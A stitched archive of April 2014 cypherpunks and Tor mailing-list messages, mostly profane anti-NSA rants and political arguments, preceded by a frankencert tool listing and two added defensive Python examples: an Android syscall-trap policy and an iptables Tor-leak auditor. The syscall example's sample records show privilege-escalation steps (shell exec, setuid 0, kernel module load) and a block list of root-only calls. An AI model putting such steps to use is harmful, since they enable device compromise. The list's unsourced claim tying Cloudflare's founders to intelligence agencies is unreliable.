create_new_ca.sh: a script for creating new CA with a self-signed cert. It creates the output cert and private key in rootCA.pem (requires OpenSSL).

test_ssl_server.py: a sample SSL/TLS server for presenting frankencerts to SSL/TLS clients

sample_seed_certs.tar.gz: Some sample certs that may be used as seeds for frankencert generation.

sample_franken.conf: A sample config file that can be used to tune different parameters of the frankencert generation process.
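The syscall-trap hook in coderman's "How safe is smartphones today?" message above (item 0 of his Android hardening list: trap syscalls by user-id and process-id, notify or block; and the "expected profile" idea behind item 1) has a policy half that can be shown without kernel code. The block below is an added example and is not code from coderman, from the Android-Rootkit repository he links, or from any Tor project material: it takes the records such a hook would hand to user space (the `ts= pid= uid= sc= arg=` line format and the sample records are constructed here), checks each call against an expected profile for the uid class, blocks calls that only root should ever make when a non-root uid issues them, and quarantines a pid once it has tripped the profile twice. The profiles, the app uid 10042, and the escalation threshold are assumptions for the example; the uid ranges (0 root, 1000 system, 10000 and up for installed apps) are the real Android layout.

```python
"""Policy half of a per-(uid, pid) syscall trap: allow, notify or block.
Added example; the profiles and trap records below are constructed."""
import collections
import re

Event = collections.namedtuple("Event", "ts pid uid syscall arg")


def uid_class(uid):
    """Map an Android uid to a coarse class (real Android uid layout)."""
    if uid == 0:
        return "root"
    if uid == 1000:
        return "system"
    if 10000 <= uid < 20000:
        return "app"
    return "other"


# Expected-call profiles per class. Assumed for this example; a real
# deployment would learn them from the device's own baseline traffic.
PROFILE = {
    "root":   {"openat", "read", "write", "mmap", "clone", "execve", "mount",
               "setuid", "setresuid", "init_module", "ptrace", "ioctl", "futex"},
    "system": {"openat", "read", "write", "mmap", "clone", "execve", "socket",
               "connect", "ioctl", "futex"},
    "app":    {"openat", "read", "write", "mmap", "clone", "socket", "connect",
               "ioctl", "futex"},
    "other":  set(),
}
# Calls no non-root uid has any business making; blocked outright.
ROOT_ONLY = {"init_module", "finit_module", "mount", "setuid", "setresuid", "ptrace"}

# Assumed record format emitted by the hook, one call per line.
LINE_RE = re.compile(r"ts=(\d+) pid=(\d+) uid=(\d+) sc=(\w+) arg=(\S*)")


def parse_event(line):
    m = LINE_RE.match(line)
    if not m:
        raise ValueError("bad trap record: %r" % line)
    ts, pid, uid, sc, arg = m.groups()
    return Event(int(ts), int(pid), int(uid), sc, arg)


def decide(ev):
    """Stateless verdict for one call: ('allow'|'notify'|'block', reason)."""
    cls = uid_class(ev.uid)
    if ev.uid != 0 and ev.syscall in ROOT_ONLY:
        return "block", "%s from non-root uid %d" % (ev.syscall, ev.uid)
    if ev.syscall not in PROFILE[cls]:
        return "notify", "%s outside %s profile" % (ev.syscall, cls)
    return "allow", ""


def triage(lines, escalate_after=2):
    """Run the policy over a stream of trap records. A pid that trips the
    profile `escalate_after` times is quarantined: every later call from it
    is blocked, whatever the stateless verdict says.
    Returns [(pid, decision, syscall, reason)] for every non-allow verdict."""
    strikes = collections.Counter()
    verdicts = []
    for line in lines:
        ev = parse_event(line)
        decision, reason = decide(ev)
        if decision != "allow":
            strikes[ev.pid] += 1
        if strikes[ev.pid] >= escalate_after and decision != "block":
            decision = "block"
            reason = "pid %d quarantined after %d anomalies" % (ev.pid, strikes[ev.pid])
        if decision != "allow":
            verdicts.append((ev.pid, decision, ev.syscall, reason))
    return verdicts


# Constructed trap records: an app process that shells out, tries to
# become root, then keeps going; a system process loading a kernel module.
SAMPLE_TRAPS = [
    "ts=1 pid=2301 uid=10042 sc=openat arg=/data/data/com.example.app/files/prefs",
    "ts=2 pid=2301 uid=10042 sc=socket arg=AF_INET",
    "ts=3 pid=2301 uid=10042 sc=connect arg=93.184.216.34:443",
    "ts=4 pid=2301 uid=10042 sc=execve arg=/system/bin/sh",
    "ts=5 pid=2301 uid=10042 sc=setuid arg=0",
    "ts=6 pid=2301 uid=10042 sc=openat arg=/data/local/tmp/payload",
    "ts=7 pid=412 uid=1000 sc=openat arg=/data/system/packages.xml",
    "ts=8 pid=412 uid=1000 sc=init_module arg=/data/local/tmp/k.ko",
    "ts=9 pid=1 uid=0 sc=mount arg=/dev/block/sda1",
]

if __name__ == "__main__":
    for pid, decision, sc, reason in triage(SAMPLE_TRAPS):
        print("%-6s pid=%d %s: %s" % (decision, pid, sc, reason))
```

Run against the sample records the execve from the app uid is only a notify (it is outside the app profile but not root-only), the setuid is blocked on its own merits, and the innocuous openat that follows is blocked too because pid 2301 is by then quarantined; the system-uid init_module is blocked while root's mount passes. In a real hook the block verdict is what the kernel returns as the syscall result; this code only decides.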
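Rusty Bird's point quoted in coderman's "Linux kernel transproxy packet leak" message above (when redirecting and filtering, filter in OUTPUT rather than INPUT) and coderman's own rule (Tor is the default path; anything unexpected gets the bit bucket) can be checked mechanically against a ruleset before it is loaded. The block below is an added example, not code from either of them or from Tor, Tails, Whonix or Qubes: it parses `iptables-save` text, flags a ruleset whose filter OUTPUT chain is left at policy ACCEPT or that accepts egress from anything other than the Tor uid or loopback, and flags filtering that lives only in INPUT. The two rulesets embedded are constructed for the example, and the Tor uid (109), TransPort (9040) and DNSPort (5353) are assumptions.

```python
"""Audit a Tor transparent-proxy iptables ruleset for the fail-open shape
discussed above: REDIRECT in nat OUTPUT, but the drop decision left to
INPUT (or to nothing) instead of being enforced in filter OUTPUT.
Added example; the rulesets below are constructed."""
import shlex
from dataclasses import dataclass, field

TOR_UID = "109"      # assumption: uid the tor daemon runs as
TRANS_PORT = "9040"  # assumption: Tor TransPort
DNS_PORT = "5353"    # assumption: Tor DNSPort


@dataclass
class Chain:
    policy: str = "-"                           # "-" for user-defined chains
    rules: list = field(default_factory=list)   # each rule as an argv list


def parse_iptables_save(text):
    """Parse `iptables-save` output into {table: {chain: Chain}}."""
    tables, table = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("*"):                    # *nat, *filter
            table = tables.setdefault(line[1:], {})
        elif line.startswith(":"):                  # :OUTPUT DROP [0:0]
            name, policy, _counters = line[1:].split()
            table[name] = Chain(policy)
        elif line.startswith("-A "):                # -A CHAIN match... -j TARGET
            argv = shlex.split(line)
            table.setdefault(argv[1], Chain()).rules.append(argv[2:])
        elif line == "COMMIT":
            table = None
    return tables


def opt(argv, flag):
    """Value following `flag` in a rule's argv, or None if absent."""
    return argv[argv.index(flag) + 1] if flag in argv else None


def audit_transproxy(text):
    """Return a list of findings; empty means the ruleset fails closed:
    everything not explicitly Tor-bound is dropped in filter OUTPUT."""
    tables = parse_iptables_save(text)
    findings = []

    nat_out = tables.get("nat", {}).get("OUTPUT", Chain())
    if not any(opt(r, "-j") == "REDIRECT" and opt(r, "--to-ports") == TRANS_PORT
               for r in nat_out.rules):
        findings.append("nat OUTPUT has no REDIRECT to TransPort " + TRANS_PORT)

    filt = tables.get("filter", {})
    out = filt.get("OUTPUT", Chain("ACCEPT"))
    if out.policy != "DROP":
        # A packet the REDIRECT does not match traverses filter OUTPUT with
        # its real destination; only a DROP policy here keeps it off the wire.
        findings.append("filter OUTPUT policy is %s, not DROP" % out.policy)
    for r in out.rules:
        if opt(r, "-j") != "ACCEPT":
            continue
        if opt(r, "-o") == "lo" or opt(r, "--uid-owner") == TOR_UID:
            continue
        findings.append("filter OUTPUT accepts non-Tor egress: " + " ".join(r))
    if filt.get("INPUT", Chain()).rules and not out.rules:
        findings.append("filtering is in INPUT only; the egress decision belongs in OUTPUT")
    return findings


# Constructed rulesets in iptables-save format, not taken from any real host.
NAT_RULES = """\
*nat
:PREROUTING ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
-A OUTPUT -o lo -j RETURN
-A OUTPUT -m owner --uid-owner 109 -j RETURN
-A OUTPUT -p udp -m udp --dport 53 -j REDIRECT --to-ports 5353
-A OUTPUT -p tcp -m tcp --syn -j REDIRECT --to-ports 9040
COMMIT
"""

# Weak: the only filtering is in INPUT; filter OUTPUT is left wide open.
WEAK_RULES = NAT_RULES + """\
*filter
:INPUT DROP [0:0]
:FORWARD DROP [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -i lo -j ACCEPT
-A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
COMMIT
"""

# Corrected: Tor (by uid) and loopback (where the REDIRECT lands) may send;
# everything else is dropped in OUTPUT, so a packet that misses the REDIRECT
# never leaves the box.
STRICT_RULES = NAT_RULES + """\
*filter
:INPUT DROP [0:0]
:FORWARD DROP [0:0]
:OUTPUT DROP [0:0]
-A INPUT -i lo -j ACCEPT
-A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
-A OUTPUT -m conntrack --ctstate INVALID -j DROP
-A OUTPUT -o lo -j ACCEPT
-A OUTPUT -m owner --uid-owner 109 -j ACCEPT
-A OUTPUT -j DROP
COMMIT
"""

if __name__ == "__main__":
    for name, rules in (("weak", WEAK_RULES), ("strict", STRICT_RULES)):
        print(name, audit_transproxy(rules) or ["ok"])
```

Feed it the output of `iptables-save` on the gateway VM (or the rules file you are about to `iptables-restore`) and treat any finding as a reason not to load the set. The check is deliberately narrow: it says nothing about the TARPIT-versus-DROP choice coderman raises, only about whether the drop happens at all and in the chain where it can work.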
From grarpamp at gmail.com Sun Apr 6 01:26:19 2014
From: grarpamp at gmail.com (grarpamp)
Date: Sun, 6 Apr 2014 04:26:19 -0400
Subject: [tor-talk] How safe is smartphones today?
In-Reply-To:
References: <533C96AF.2050004@anonymous.coward.posteo.de> <20140403013535.GA9002@torproject.org> <533D33AD.3040509@sent.at>
Message-ID:

> for any decent attacker, mobile platforms are just fucked. sorry!
> this is true until you can implement an entire isolated SDR stack;
> even opaque wifi blobs are fail.

SDR... fun gear for btc miners to spend their coin on.

Related reading,
a Nexus 5 service manual search string: 173744848-LG-D821.pdf

From me at staticsafe.ca Sun Apr 6 08:35:50 2014
From: me at staticsafe.ca (staticsafe)
Date: Sun, 06 Apr 2014 11:35:50 -0400
Subject: [cryptography] Github Pages now supports SSL
In-Reply-To: <2032043828.224611.1396795238185.JavaMail.www@wwinf8228>
References: <2032043828.224611.1396795238185.JavaMail.www@wwinf8228>
Message-ID: <53417456.2060405@staticsafe.ca>

On 4/6/2014 10:40, tpb-crypto at laposte.net wrote:
>> Message from 04/04/14 20:09
>> From: "Eric Mill"
>> Along with Cloudflare's 2014 plan to offer SSL termination for free, and
>> their stated plan to double SSL on the Internet by end of year, the barrier
>> to HTTPS everywhere is dropping rapidly.
>>
>
> I agree that putting https everywhere is great, but Cloudflare's founders are tightly linked with the US-intelligence community. That fact alone kind of kills any claims they make about data security within their service.

Source for this please?
-- 
staticsafe

From gwen at cypherpunks.to Sun Apr 6 13:51:54 2014
From: gwen at cypherpunks.to (gwen hastings)
Date: Sun, 06 Apr 2014 13:51:54 -0700
Subject: FUCK THE FUCKING NSA AND THE APOLOGISTS FOR SAME FUCK YOU!!!Re: fuck ALL obscene systems of covert compromise and corruption [was: Geoff Stone, Obama's Review Group]
In-Reply-To: <6885D313C801F146232AFB56@F74D39FA044AA309EAEA14B9>
References: <6885D313C801F146232AFB56@F74D39FA044AA309EAEA14B9>
Message-ID: <5341BE6A.6060105@cypherpunks.to>

FUCK THE NSA!!

asshat motherfuckers!

warmly

gwen

On 4/6/14 1:31 PM, Juan Garofalo wrote:
>
>
> --On Saturday, April 05, 2014 8:52 PM -0700 coderman
> wrote:
>
>
>>
>>> It gradually became apparent to me that in the months after
>>> Edward Snowden began releasing information about the government's
>>> foreign intelligence surveillance activities, the NSA was being
>>> severely -- and unfairly -- demonized by its critics.
>>
>> conflating NSA as an institutional entity, NSA tasking, and NSA staff.
>>
>> NSA tasking is bad and should feel bad.
>>
>> NSA institutional culture is less bad, yet needs correction.
>>
>> NSA employees individually? they have been deceived and demoralized
>> themselves! this group is the least culpable, in my eyes.
>
>
> Are you joking? The 'NSA institutional entity' IS NOTHING BUT THE
> COLLECTION OF NSA EMPLOYEES.
>
> Ah, yes, this team of murderers is bad 'as a team', but when you look at
> each individual murderer, individually they are
> anarcho-libertarian-pacifists who live in a monastery in tibet.
>
> Please.
>
>
>

-- 
Tentacle #99

ecc public key curve p25519(pcp 0.15)

1l0$WoM5C8z=yeZG7?$]f^Uu8.g>4rf#t^6mfW9(rr910

Governments are instituted among men, deriving their just powers from the consent of the governed, that whenever any form of government becomes destructive of these ends, it is the right of the people to alter or abolish it, and to institute new government, laying its foundation on such principles, and organizing its powers in such form, as to them shall seem most likely to effect their safety and happiness.’

https://github.com/TLINDEN/pcp.git to get pcp(curve25519 cli)
https://github.com/stef/pbp.git (curve 25519 python based cli)

From ryacko at gmail.com Sun Apr 6 14:28:51 2014
From: ryacko at gmail.com (Ryan Carboni)
Date: Sun, 6 Apr 2014 14:28:51 -0700
Subject: [cryptography] Github Pages now supports SSL
In-Reply-To: <450704774.433340.1396812055146.JavaMail.www@wwinf8222>
References: <2032043828.224611.1396795238185.JavaMail.www@wwinf8228> <53417456.2060405@staticsafe.ca> <450704774.433340.1396812055146.JavaMail.www@wwinf8222>
Message-ID:

oh dear. He helped the government combat crime and nuisance style offenses. Clearly in collusion.

On Sun, Apr 6, 2014 at 12:20 PM, wrote:
>> Message du 06/04/14 17:41
>> De : "staticsafe"
>> On 4/6/2014 10:40, tpb-crypto at laposte.net wrote:
>>>> Message du 04/04/14 20:09
>>>> De : "Eric Mill"
>>>> Along with Cloudflare's 2014 plan to offer SSL termination for free, and
>>>> their stated plan to double SSL on the Internet by end of year, the barrier
>>>> to HTTPS everywhere is dropping rapidly.
>>>>
>>>
>>> I agree that putting https everywhere is great, but Cloudflare's founders are tightly linked with the US-intelligence community. That fact alone kind of kills any claims they make about data security within their service.
>>
>> Source for this please?
>>
>
> Is it so painful to do your own homework?
>
> "Matthew Prince, Lee Holloway, and Michelle Zatlyn created CloudFlare in
> 2009.[1][2] They previously worked on Project Honey Pot." -
> http://en.wikipedia.org/wiki/CloudFlare
>
> "[...] the project organizers also help various law enforcement agencies
> combat private and commercial unsolicited bulk mailing offenses and overall
> work to help reduce the amount of spam being sent [...]" -
> http://en.wikipedia.org/wiki/Project_Honey_Pot
>
> That's just for starters, you can dig more and find more. It is
> interesting that the history of the founders themselves is no longer
> exhibited in cloudflare.com website as it was years ago.
>
>
> As an American company, there is nothing preventing Cloudflare from
> receiving NSLs and having to shut up about them. What use is a system that
> you can't trust like this?
>
> You can say "oh, but they go after the bad guys, spammers". But that
> doesn't limit it to spammers neither do we know who are the so called bad
> guys, since that is decided by American secret laws, made by secret courts,
> that issue secret orders.
>
> No trust to American companies, less even trust to American companies that
> promise any kind of data security. Better no security than a false sense of
> it.
>
> Sorry.
> _______________________________________________
> cryptography mailing list
> cryptography at randombit.net
> http://lists.randombit.net/mailman/listinfo/cryptography
>

From grarpamp at gmail.com Sun Apr 6 12:14:03 2014
From: grarpamp at gmail.com (grarpamp)
Date: Sun, 6 Apr 2014 15:14:03 -0400
Subject: [tor-talk] How safe is smartphones today?
In-Reply-To:
References: <533C96AF.2050004@anonymous.coward.posteo.de> <20140403013535.GA9002@torproject.org> <533D33AD.3040509@sent.at>
Message-ID:

> the old GPUs that used to pool mine before the ASIC takeover are great
> for searching key spaces and permutated dictionaries, but seems the
> SDR adoption is lacking. traditionally, SDR is narrowband focused,
> low overhead more than amenable to CPU cycles. very wide band, very
> high rate, multi-radio SDR setups are just now coming into independent
> exploration; perhaps then old GPUs can be brought back to utility!

Agreed near-unlimited-width SDR has fun potential, and for cpunks some equally hard to identify/jam/locate encrypted comms that don't interfere with traditional narrow comms.

There are some cheap ex-mining FPGA rigs being dumped on the market too now that they're worthless to the majority of their point-and-click owners.

> my favorite odd band technical input is still the barcode scanners
> from decades past which would interpret scanned input and escapes same

http://americanhistory.si.edu/collections/search/object/nmah_892778
https://en.wikipedia.org/wiki/Helium-neon_laser

My later unit of this same class of tech still reads UPC's, love the sounds it makes.

> as keyboard console entry. factory reset SMS type attacks have been
> ongoing for so many years, the same mistakes over and over. back
> then, you could claim innocent times. today, there is just no excuse.

No doubt in part because we forget wisdom of history in favor of new hotness. Will be pretty sad when in 2100 we have to literally rediscover things from scratch because they're lost. ie: "How the fuck did they do that and their hacking tricks."

http://thecorememory.com/

From adi at hexapodia.org Sun Apr 6 15:14:49 2014
From: adi at hexapodia.org (Andy Isaacson)
Date: Sun, 6 Apr 2014 15:14:49 -0700
Subject: [tor-talk] How safe is smartphones today?
In-Reply-To:
References: <533C96AF.2050004@anonymous.coward.posteo.de> <20140403013535.GA9002@torproject.org> <533D33AD.3040509@sent.at>
Message-ID: <20140406221449.GT18407@hexapodia.org>

On Sat, Apr 05, 2014 at 09:30:25PM -0700, coderman wrote:
> for any decent attacker, mobile platforms are just fucked. sorry!
> this is true until you can implement an entire isolated SDR stack;
> even opaque wifi blobs are fail.
> [i've stated my preference for various software defined radio setups
> before, omitted.]

Agreed that free-software SDR is better in the long run, but there are blob-free WiFi cards available:

https://www.fsf.org/resources/hw/endorsement/thinkpenguin

(they even let you pay with bitcoin.)

-andy

From scott at sbce.org Sun Apr 6 13:42:52 2014
From: scott at sbce.org (Scott Blaydes)
Date: Sun, 6 Apr 2014 15:42:52 -0500
Subject: [cryptography] Github Pages now supports SSL
In-Reply-To: <450704774.433340.1396812055146.JavaMail.www@wwinf8222>
References: <2032043828.224611.1396795238185.JavaMail.www@wwinf8228> <53417456.2060405@staticsafe.ca> <450704774.433340.1396812055146.JavaMail.www@wwinf8222>
Message-ID:

On Apr 6, 2014, at 2:20 PM, tpb-crypto at laposte.net wrote:
>> Message du 06/04/14 17:41
>> De : "staticsafe"
>> On 4/6/2014 10:40, tpb-crypto at laposte.net wrote:
>>>> Message du 04/04/14 20:09
>>>> De : "Eric Mill"
>>>> Along with Cloudflare's 2014 plan to offer SSL termination for free, and
>>>> their stated plan to double SSL on the Internet by end of year, the barrier
>>>> to HTTPS everywhere is dropping rapidly.
>>>>
>>>
>>> I agree that putting https everywhere is great, but Cloudflare's founders are tightly linked with the US-intelligence community. That fact alone kind of kills any claims they make about data security within their service.
>>
>> Source for this please?
>>
>
> Is it so painful to do your own homework?
>
> "Matthew Prince, Lee Holloway, and Michelle Zatlyn created CloudFlare in 2009.[1][2] They previously worked on Project Honey Pot." - http://en.wikipedia.org/wiki/CloudFlare
>
> "[...] the project organizers also help various law enforcement agencies combat private and commercial unsolicited bulk mailing offenses and overall work to help reduce the amount of spam being sent [...]" - http://en.wikipedia.org/wiki/Project_Honey_Pot
>
> That's just for starters, you can dig more and find more. It is interesting that the history of the founders themselves is no longer exhibited in cloudflare.com website as it was years ago.
>
>
> As an American company, there is nothing preventing Cloudflare from receiving NSLs and having to shut up about them. What use is a system that you can't trust like this?
>
> You can say "oh, but they go after the bad guys, spammers". But that doesn't limit it to spammers neither do we know who are the so called bad guys, since that is decided by American secret laws, made by secret courts, that issue secret orders.
>
> No trust to American companies, less even trust to American companies that promise any kind of data security. Better no security than a false sense of it.
>
> Sorry.

I have noticed CloudFlare CAPTCHA screens before I can access some sites via Tor. This begs the question of how much data is CloudFlare gathering from Tor exit nodes and who are they selling it to? Due to links with the US Intelligence community and possibly receiving NSLs, they are in a great position to provide information about what people use Tor for. Perhaps thwarting spammers is a great cover for keeping track of traffic to and from alleged terrorist IPs/Net blocks. Since they also help mitigate DDoS attacks, they can also keep track of alleged Anonymous pwned hosts used for originating DDoS campaigns. They are a great “in the trenches” company that can be very versatile for keeping track of the Bad Guys(tm).
Thank you,
Scott

From shelley at misanthropia.info Sun Apr 6 16:32:46 2014
From: shelley at misanthropia.info (shelley at misanthropia.info)
Date: Sun, 06 Apr 2014 16:32:46 -0700
Subject: FUCK THE FUCKING NSA AND THE APOLOGISTS FOR SAME FUCK YOU!!!Re: fuck ALL obscene systems of covert compromise and corruption [was: Geoff Stone, Obama's Review Group]
In-Reply-To:
References: <6885D313C801F146232AFB56@F74D39FA044AA309EAEA14B9> <5341BE6A.6060105@cypherpunks.to>
Message-ID: <1396827166.14348.103428341.4066134F@webmail.messagingengine.com>

On Sun, Apr 6, 2014, at 03:37 PM, Scott Blaydes wrote:
> New NWA (Nerds With Access) song “Fuck the Police^H^H^H^H^H^H NSA”
> available soon on a torrent site near you.

I'm totally in! Can provide synth and tape loops, while wearing EFF stickers on my boobs.

>
> On Apr 6, 2014, at 3:51 PM, gwen hastings <> wrote:
>
>> FUCK THE NSA!!
>>
>> asshat motherfuckers!
>>
>> warmly
>> gwen
>>
>> On 4/6/14 1:31 PM, Juan Garofalo wrote:
>>>
>>>
>>> --On Saturday, April 05, 2014 8:52 PM -0700 coderman <>
>>> wrote:
>>>
>>>
>>>>
>>>>> It gradually became apparent to me that in the months after
>>>>> Edward Snowden began releasing information about the government's
>>>>> foreign intelligence surveillance activities, the NSA was being
>>>>> severely -- and unfairly -- demonized by its critics.
>>>>
>>>> conflating NSA as an institutional entity, NSA tasking, and NSA staff.
>>>>
>>>> NSA tasking is bad and should feel bad.
>>>>
>>>> NSA institutional culture is less bad, yet needs correction.
>>>>
>>>> NSA employees individually? they have been deceived and demoralized
>>>> themselves! this group is the least culpable, in my eyes.
>>>
>>>
>>> Are you joking?
>>> The 'NSA institutional entity' IS NOTHING BUT THE
>>> COLLECTION OF NSA EMPLOYEES.
>>>
>>> Ah, yes, this team of murderers is bad 'as a team', but when you look at
>>> each individual murderer, individually they are
>>> anarcho-libertarian-pacifists who live in a monastery in tibet.
>>>
>>> Please.
>>>
>>
>>
>> -- 
>> Tentacle #99
>>
>> ecc public key curve p25519(pcp 0.15)
>>
>> 1l0$WoM5C8z=yeZG7?$]f^Uu8.g>4rf#t^6mfW9(rr910
>>
>> Governments are instituted among men,
>> deriving their just powers from the consent of the governed,
>> that whenever any form of government becomes destructive
>> of these ends, it is the right of the people to alter or
>> abolish it, and to institute new government, laying its
>> foundation on such principles, and organizing its powers
>> in such form, as to them shall seem most likely to effect
>> their safety and happiness.’
>>
>> to get pcp(curve25519 cli)
>> (curve 25519 python based cli)
>> <0x42AA24D5.asc>
>
> Email had 1 attachment:
> + signature.asc
> 1k (application/pgp-signature)

From tpb-crypto at laposte.net Sun Apr 6 07:40:55 2014
From: tpb-crypto at laposte.net (tpb-crypto at laposte.net)
Date: Sun, 06 Apr 2014 16:40:55 +0200
Subject: [cryptography] Github Pages now supports SSL
In-Reply-To:
References:
Message-ID: <2032043828.224611.1396795238185.JavaMail.www@wwinf8228>

> Message du 04/04/14 20:09
> De : "Eric Mill"
> Along with Cloudflare's 2014 plan to offer SSL termination for free, and
> their stated plan to double SSL on the Internet by end of year, the barrier
> to HTTPS everywhere is dropping rapidly.
>

I agree that putting https everywhere is great, but Cloudflare's founders are tightly linked with the US-intelligence community. That fact alone kind of kills any claims they make about data security within their service.
From tpb-crypto at laposte.net Sun Apr 6 07:43:46 2014
From: tpb-crypto at laposte.net (tpb-crypto at laposte.net)
Date: Sun, 06 Apr 2014 16:43:46 +0200
Subject: Geoff Stone, Obama's Review Group
In-Reply-To:
References: <20140403025616.D514A2280D8@palinka.tinho.net> <966007728.44996.1396564331597.JavaMail.www@wwinf8313> <9857014.dptqhKsx4l@lap> <2061449686.115376.1396620102841.JavaMail.www@wwinf8223> <1819357077.122066.1396626224143.JavaMail.www@wwinf8223>
Message-ID: <272995784.224718.1396795409402.JavaMail.www@wwinf8228>

> Message du 04/04/14 19:57
> De : "Cari Machet"
>
>
> i would never feel an inbox and am wholly against 'feeling inboxes' not
> down at all for that ever
>
> meow kitty kitty (is my insenuation made clear?)
>

Maybe, one day typing correctors will work better, as of now you should be aware of this fact since you are so smart.

From tpb-crypto at laposte.net Sun Apr 6 08:00:02 2014
From: tpb-crypto at laposte.net (tpb-crypto at laposte.net)
Date: Sun, 06 Apr 2014 17:00:02 +0200
Subject: Geoff Stone, Obama's Review Group
In-Reply-To:
References: <533EF242.5010604@loom.cc> <20140405024449.EF1112280DB@palinka.tinho.net>
Message-ID: <694807031.225350.1396796385327.JavaMail.www@wwinf8228>

> Message du 05/04/14 12:19
> De : "Cari Machet"
> slime likes to group together and create cavities in peoples minds
> deep
> holes
>
> none of you apparently have the capacity to actually make any arguments
> against what i write therefore have to resort to sick tactics like school
> children mentality how the fuck old are you supposed men?
>

How about you stop stamping your little feet to the ground while screaming "capitalists" once in a while?
From tpb-crypto at laposte.net Sun Apr 6 08:02:41 2014
From: tpb-crypto at laposte.net (tpb-crypto at laposte.net)
Date: Sun, 06 Apr 2014 17:02:41 +0200
Subject: reminder of mays manifesto
In-Reply-To:
References:
Message-ID: <484396473.225471.1396796544364.JavaMail.www@wwinf8228>

> Message du 05/04/14 14:35
> De : "Cari Machet"
> i post this here as a reminder of anarchist models and how they can be
> utilized in fascist occasions and are anti fascist but also are anti
> capitalist - anarchist models are found in every sector that i know of [...]

How about an anarchist model that is against socialism/communism/cultural-marxism/political-correctness/big-brother once in a while for a change?

From tedks at riseup.net Sun Apr 6 14:19:21 2014
From: tedks at riseup.net (Ted Smith)
Date: Sun, 06 Apr 2014 17:19:21 -0400
Subject: reminder of mays manifesto
In-Reply-To: <484396473.225471.1396796544364.JavaMail.www@wwinf8228>
References: <484396473.225471.1396796544364.JavaMail.www@wwinf8228>
Message-ID: <1396819161.25668.17.camel@anglachel>

On Sun, 2014-04-06 at 17:02 +0200, tpb-crypto at laposte.net wrote:
>> Message du 05/04/14 14:35
>> De : "Cari Machet"
>> i post this here as a reminder of anarchist models and how they can be
>> utilized in fascist occasions and are anti fascist but also are anti
>> capitalist - anarchist models are found in every sector that i know of [...]
>
> How about an anarchist model that is against
> socialism/communism/cultural-marxism/political-correctness/big-brother
> once in a while for a change?

There's no such thing as anarchism against socialism. Anarchism is a socialist/communist ideology; conceiving of non-socialist anarchism is like conceiving of atheist christianity -- it just doesn't make sense. There's some postmodernist "post-left" anarchism, but even that is still anti-capitalist and frankly communist, they're just less aligned with the historical trends of communism.
If this is surprising, I suggest reading the Anarchist FAQ: http://anarchism.pageabode.com/afaq/index.html

-- 
Sent from Ubuntu

From juan.g71 at gmail.com Sun Apr 6 13:31:24 2014
From: juan.g71 at gmail.com (Juan Garofalo)
Date: Sun, 06 Apr 2014 17:31:24 -0300
Subject: fuck ALL obscene systems of covert compromise and corruption [was: Geoff Stone, Obama's Review Group]
In-Reply-To:
References:
Message-ID: <6885D313C801F146232AFB56@F74D39FA044AA309EAEA14B9>

--On Saturday, April 05, 2014 8:52 PM -0700 coderman wrote:

>
>> It gradually became apparent to me that in the months after
>> Edward Snowden began releasing information about the government's
>> foreign intelligence surveillance activities, the NSA was being
>> severely -- and unfairly -- demonized by its critics.
>
> conflating NSA as an institutional entity, NSA tasking, and NSA staff.
>
> NSA tasking is bad and should feel bad.
>
> NSA institutional culture is less bad, yet needs correction.
>
> NSA employees individually? they have been deceived and demoralized
> themselves! this group is the least culpable, in my eyes.

Are you joking? The 'NSA institutional entity' IS NOTHING BUT THE COLLECTION OF NSA EMPLOYEES.

Ah, yes, this team of murderers is bad 'as a team', but when you look at each individual murderer, individually they are anarcho-libertarian-pacifists who live in a monastery in tibet.

Please.
From scott at sbce.org Sun Apr 6 15:37:44 2014
From: scott at sbce.org (Scott Blaydes)
Date: Sun, 6 Apr 2014 17:37:44 -0500
Subject: FUCK THE FUCKING NSA AND THE APOLOGISTS FOR SAME FUCK YOU!!!Re: fuck ALL obscene systems of covert compromise and corruption [was: Geoff Stone, Obama's Review Group]
In-Reply-To: <5341BE6A.6060105@cypherpunks.to>
References: <6885D313C801F146232AFB56@F74D39FA044AA309EAEA14B9> <5341BE6A.6060105@cypherpunks.to>
Message-ID:

New NWA (Nerds With Access) song “Fuck the Police^H^H^H^H^H^H NSA” available soon on a torrent site near you.

On Apr 6, 2014, at 3:51 PM, gwen hastings wrote:

> FUCK THE NSA!!
>
> asshat motherfuckers!
>
> warmly
> gwen
>
> On 4/6/14 1:31 PM, Juan Garofalo wrote:
>>
>>
>> --On Saturday, April 05, 2014 8:52 PM -0700 coderman
>> wrote:
>>
>>
>>>
>>>> It gradually became apparent to me that in the months after
>>>> Edward Snowden began releasing information about the government's
>>>> foreign intelligence surveillance activities, the NSA was being
>>>> severely -- and unfairly -- demonized by its critics.
>>>
>>> conflating NSA as an institutional entity, NSA tasking, and NSA staff.
>>>
>>> NSA tasking is bad and should feel bad.
>>>
>>> NSA institutional culture is less bad, yet needs correction.
>>>
>>> NSA employees individually? they have been deceived and demoralized
>>> themselves! this group is the least culpable, in my eyes.
>>
>>
>> Are you joking? The 'NSA institutional entity' IS NOTHING BUT THE
>> COLLECTION OF NSA EMPLOYEES.
>>
>> Ah, yes, this team of murderers is bad 'as a team', but when you look at
>> each individual murderer, individually they are
>> anarcho-libertarian-pacifists who live in a monastery in tibet.
>>
>> Please.
>>
>>
>>
>
>
> -- 
> Tentacle #99
>
> ecc public key curve p25519(pcp 0.15)
>
> 1l0$WoM5C8z=yeZG7?$]f^Uu8.g>4rf#t^6mfW9(rr910
>
> Governments are instituted among men,
> deriving their just powers from the consent of the governed,
> that whenever any form of government becomes destructive
> of these ends, it is the right of the people to alter or
> abolish it, and to institute new government, laying its
> foundation on such principles, and organizing its powers
> in such form, as to them shall seem most likely to effect
> their safety and happiness.’
>
> https://github.com/TLINDEN/pcp.git to get pcp(curve25519 cli)
> https://github.com/stef/pbp.git (curve 25519 python based cli)
> <0x42AA24D5.asc>

From carimachet at gmail.com Sun Apr 6 13:11:42 2014
From: carimachet at gmail.com (Cari Machet)
Date: Sun, 6 Apr 2014 20:11:42 +0000
Subject: reminder of mays manifesto
In-Reply-To: <484396473.225471.1396796544364.JavaMail.www@wwinf8228>
References: <484396473.225471.1396796544364.JavaMail.www@wwinf8228>
Message-ID:

On Sun, Apr 6, 2014 at 3:02 PM, wrote:
>> Message du 05/04/14 14:35
>> De : "Cari Machet"
>> i post this here as a reminder of anarchist models and how they can be
